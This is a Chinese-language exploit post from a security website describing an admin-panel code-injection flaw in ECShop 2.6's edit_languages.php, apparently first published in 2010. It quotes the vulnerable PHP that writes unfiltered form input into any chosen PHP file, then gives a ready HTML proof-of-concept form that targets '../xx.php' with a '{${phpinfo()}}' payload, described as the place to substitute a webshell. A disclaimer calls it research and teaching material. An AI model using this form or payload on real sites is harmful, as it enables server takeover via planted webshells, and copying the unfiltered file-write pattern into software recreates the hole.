首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
ecshop后台写shell 0day
来源:http://www.x-xox-x.net 作者:xhm1n9 发布时间:2010-12-29  
Author: xhm1n9[ESST]
EMail:xhm1n9@0x70.com
Site: http://www.x-xox-x.net
Date: 2010-12-27 10:22:15
From: http://x-xox-x.net/exploit/11

3月份的东西,现在发出来。
adminedit_languages.php

    相关变量没过滤!

    elseif ($_REQUEST['act'] == 'edit')
{
    /* 语言项的路径 */
    $lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';

    /* 替换前的语言项 */
    $src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';

    /* 修改过后的语言项 */
    $dst_items = array();
    $_POST['item_id'] = stripslashes_deep($_POST['item_id']);

    for ($i = 0; $i < count($_POST['item_id']); $i++)
    {
        /* 语言项内容如果为空,不修改 */
        if (trim($_POST['item_content'][$i]) == '')
        {
            unset($src_items[$i]);
        }
        else
        {
            $_POST['item_content'][$i] = str_replace('\\n', '\n', $_POST['item_content'][$i]);
            $dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
        }
    }

    /* 调用函数编辑语言项 */
    $result = set_language_items($lang_file, $src_items, $dst_items);

    if ($result === false)
    {
        /* 修改失败提示信息 */
        $link[] = array('text' => $_LANG['back_list'], 'href' => 'javascript:history.back(-1)');
        sys_msg($_LANG['edit_languages_false'], 0, $link);
    }

........................................
  function set_language_items($file_path, $src_items, $dst_items)
{
    /* 检查文件是否可写(修改) */
    if (file_mode_info($file_path) < 2)
    {
        return false;
    }

    /* 获取文件内容 */
    $line_array = file($file_path);
    if (!$line_array)
    {
        return false;
    }
    else
    {
        $file_content = implode('', $line_array);
    }

    $snum = count($src_items);
    $dnum = count($dst_items);
    if ($snum != $dnum)
    {
        return false;
    }
    /* 对索引进行排序,防止错位替换 */
    ksort($src_items);
    ksort($dst_items);
    for ($i = 0; $i < $snum; $i++)
    {
        $file_content = str_replace($src_items[$i], $dst_items[$i], $file_content);

    }

    /* 写入修改后的语言项 */
    $f = fopen($file_path, 'wb');
    if (!$f)
    {
        return false;
    }
    if (!fwrite($f, $file_content))
    {
        return false;
    }
    else
    {
        return true;
    }
}

测试方法:
[www.x-xox-x.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<title>ecshop 2.6 后台拿shell   by:xhm1n9</title>
  <form name="searchForm" action="http://127.1/ecshop2.6/admin/edit_languages.php" method="post">
    文件:<input type="text" name="file_path" size="36" value="../xx.php" /><br>任意php文件
    关键字: <input type="text" name="item" size="32" value="" /><br>选定文件里的内容
    注入语句:<input type="text" name="item_content[]" size="30" value="{${phpinfo()}}" /><br>要替换的马
            <input type="hidden" name="item_id" size="30" value="0" /><br>
    <input type="submit" value=" 搜索 " class="button" /> <input type="hidden" name="act" value="edit" />
  </form>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·v5Shop 注入 漏洞整理
·Phpwind远程任意代码执行漏洞
·zblog最新漏洞及修复方法
·shopv8的注入漏洞利用
·最新ECshop 支付方式注射 0day
·Sdcms v1.3 漏洞利用
·动网8.1最新注入0Day漏洞
·动网(DVBBS)Version 8.2.0 后
·IIS写权限利用续以及写权限漏洞
·W78cms网站管理系统0day
·ecshop 通杀2.6*2.7 GBK版本 oda
·ecshop最新版(v2.72) 本地包含漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved